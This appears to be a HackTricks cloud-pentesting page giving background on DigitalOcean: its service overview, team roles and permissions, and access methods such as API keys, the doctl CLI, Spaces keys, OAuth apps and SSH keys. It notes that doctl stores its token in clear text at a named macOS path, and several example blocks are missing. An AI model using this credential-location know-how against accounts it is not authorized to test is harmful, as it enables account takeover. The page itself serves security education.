DO - Basic Information
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Basic Information
DigitalOcean is a cloud computing platform that provides users with a variety of services, including virtual private servers (VPS) and other resources for building, deploying, and managing applications. DigitalOcean's services are designed to be simple and easy to use, making them popular among developers and small businesses.
Some of the key features of DigitalOcean include:
Virtual private servers (VPS): DigitalOcean provides VPS that can be used to host websites and applications. These VPS are known for their simplicity and ease of use, and can be quickly and easily deployed using a variety of pre-built "droplets" or custom configurations.
Storage: DigitalOcean offers a range of storage options, including object storage, block storage, and managed databases, that can be used to store and manage data for websites and applications.
Development and deployment tools: DigitalOcean provides a range of tools that can be used to build, deploy, and manage applications, including APIs and pre-built droplets.
Security: DigitalOcean places a strong emphasis on security, and offers a range of tools and features to help users keep their data and applications safe. This includes encryption, backups, and other security measures.
Overall, DigitalOcean is a cloud computing platform that provides users with the tools and resources they need to build, deploy, and manage applications in the cloud. Its services are designed to be simple and easy to use, making them popular among developers and small businesses.
Main Differences from AWS
One of the main differences between DigitalOcean and AWS is the range of services they offer. DigitalOcean focuses on providing simple and easy-to-use virtual private servers (VPS), storage, and development and deployment tools. AWS, on the other hand, offers a much broader range of services, including VPS, storage, databases, machine learning, analytics, and many other services. This means that AWS is more suitable for complex, enterprise-level applications, while DigitalOcean is more suited to small businesses and developers.
Another key difference between the two platforms is the pricing structure. DigitalOcean's pricing is generally more straightforward and easier to understand than AWS, with a range of pricing plans that are based on the number of droplets and other resources used. AWS, on the other hand, has a more complex pricing structure that is based on a variety of factors, including the type and amount of resources used. This can make it more difficult to predict costs when using AWS.
Hierarchy
User
A user is what you expect, a user. He can create Teams and be a member of different teams.
Team
A team is a group of users. When a user creates a team he has the role owner on that team and he initially sets up the billing info. Other user can then be invited to the team.
Inside the team there might be several projects. A project is just a set of services running. It can be used to separate different infra stages, like prod, staging, dev...
Project
As explained, a project is just a container for all the services (droplets, spaces, databases, kubernetes...) running together inside of it. A Digital Ocean project is very similar to a GCP project without IAM.
Permissions
Team
Basically all members of a team have access to the DO resources in all the projects created within the team (with more or less privileges).
Roles
Each user inside a team can have one of the following three roles inside of it:
Role | Shared Resources | Billing Information | Team Settings |
---|---|---|---|
Owner | Full access | Full access | Full access |
Biller | No access | Full access | No access |
Member | Full access | No access | No access |
Owner and member can list the users and check their roles (biller cannot).
Access
Username + password (MFA)
As in most of the platforms, in order to access to the GUI you can use a set of valid username and password to access the cloud resources. Once logged in you can see all the teams you are part of in https://cloud.digitalocean.com/account/profile. And you can see all your activity in https://cloud.digitalocean.com/account/activity.
MFA can be enabled in a user and enforced for all the users in a team to access the team.
API keys
In order to use the API, users can generate API keys. These will always come with Read permissions but Write permission are optional. The API keys look like this:
The cli tool is doctl. Initialise it (you need a token) with:
By default this token will be written in clear-text in Mac in /Users/<username>/Library/Application Support/doctl/config.yaml
.
Spaces access keys
These are keys that give access to the Spaces (like S3 in AWS or Storage in GCP).
They are composed by a name, a keyid and a secret. An example could be:
OAuth Application
OAuth applications can be granted access over Digital Ocean.
It's possible to create OAuth applications in https://cloud.digitalocean.com/account/api/applications and check all allowed OAuth applications in https://cloud.digitalocean.com/account/api/access.
SSH Keys
It's possible to add SSH keys to a Digital Ocean Team from the console in https://cloud.digitalocean.com/account/security.
This way, if you create a new droplet, the SSH key will be set on it and you will be able to login via SSH without password (note that newly uploaded SSH keys aren't set in already existent droplets for security reasons).
Functions Authentication Token
The way to trigger a function via REST API (always enabled, it's the method the cli uses) is by triggering a request with an authentication token like:
Logs
User logs
The logs of a user can be found in https://cloud.digitalocean.com/account/activity
Team logs
The logs of a team can be found in https://cloud.digitalocean.com/account/security
References
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Last updated